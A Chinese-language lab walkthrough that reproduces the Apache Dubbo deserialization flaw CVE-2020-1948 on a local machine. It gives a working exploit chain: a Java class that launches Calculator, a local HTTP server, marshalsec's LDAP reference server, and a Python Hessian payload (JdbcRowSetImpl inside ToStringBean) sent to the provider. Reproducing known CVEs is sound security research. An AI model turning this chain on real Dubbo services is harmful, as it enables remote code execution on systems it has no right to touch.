[CVE]重现dubbo安全漏洞cve-2020-1948

环境信息

➜  ~ java -version
java version "1.8.0_121"
Java(TM) SE Runtime Environment (build 1.8.0_121-b13)
Java HotSpot(TM) 64-Bit Server VM (build 25.121-b13, mixed mode)

➜  ~ uname -a
Darwin simondemac.local 18.7.0 Darwin Kernel Version 18.7.0: Tue Aug 20 16:57:14 PDT 2019; root:xnu-4903.271.2~2/RELEASE_X86_64 x86_64
➜  ~ sw_vers
ProductName:	Mac OS X
ProductVersion:	10.14.6
BuildVersion:	18G103

准备provider服务

直接用官方的demo，clone之后做少许改动，主要改动点是添加一个jar包依赖

git clone https://github.com/apache/dubbo-spring-boot-project
cd dubbo-spring-boot-project
git checkout 2.7.1 -b b2.7.1

然后将项目导入到你喜欢的ide中。

在provider-sample项目的pom.xml(dubbo-spring-boot-project/dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml)中增加依赖：

<dependency>
  <groupId>com.rometools</groupId>
  <artifactId>rome</artifactId>
  <version>1.7.0</version>
</dependency>

修改默认端口：dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties为12347

运行DubboAutoConfigurationProviderBootstrap 把provider启动起来。

准备ExploitMac

public class ExploitMac{public ExploitMac(){try{java.lang.Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");}catch(java.io.IOException e){e.printStackTrace();}}}

编译ExploitMac.java

javac ExploitMac.java

准备一个http服务

安装python3,mac可以用homebrew安装，或者官网下载包回来装

在上面ExploitMac.class所在目录下启动一个http服务

python3 -m http.server 8088

准备marshalsec

去git上clone出来，自己package

git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn package -DskipTests

启动marshalsec

cd target
java -cp ./target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8088/\#ExploitMac 8087

准备dubbo-consumer-demo.py

from dubbo.codec.hessian2 import Decoder,new_object
from dubbo.client import DubboClient

client = DubboClient('127.0.0.1', 12347)

JdbcRowSetImpl=new_object(
      'com.sun.rowset.JdbcRowSetImpl',
      dataSource="ldap://127.0.0.1:8087/ExploitMac",
      strMatchColumns=["foo"]
      )
JdbcRowSetImplClass=new_object(
      'java.lang.Class',
      name="com.sun.rowset.JdbcRowSetImpl",
      )
toStringBean=new_object(
      'com.rometools.rome.feed.impl.ToStringBean',
      beanClass=JdbcRowSetImplClass,
      obj=JdbcRowSetImpl
      )

resp = client.send_request_and_return_response(
    service_name='com.code260.ss.dubbo.demov.facade.service.UserService',
    method_name='sayHello',
    args=[toStringBean])

安装dubbo-py

python3 -m pip install dubbo-py

执行上面工具脚本

python3 dubbo-consumer-demo.py

复现了，能成功看到计算器弹出来…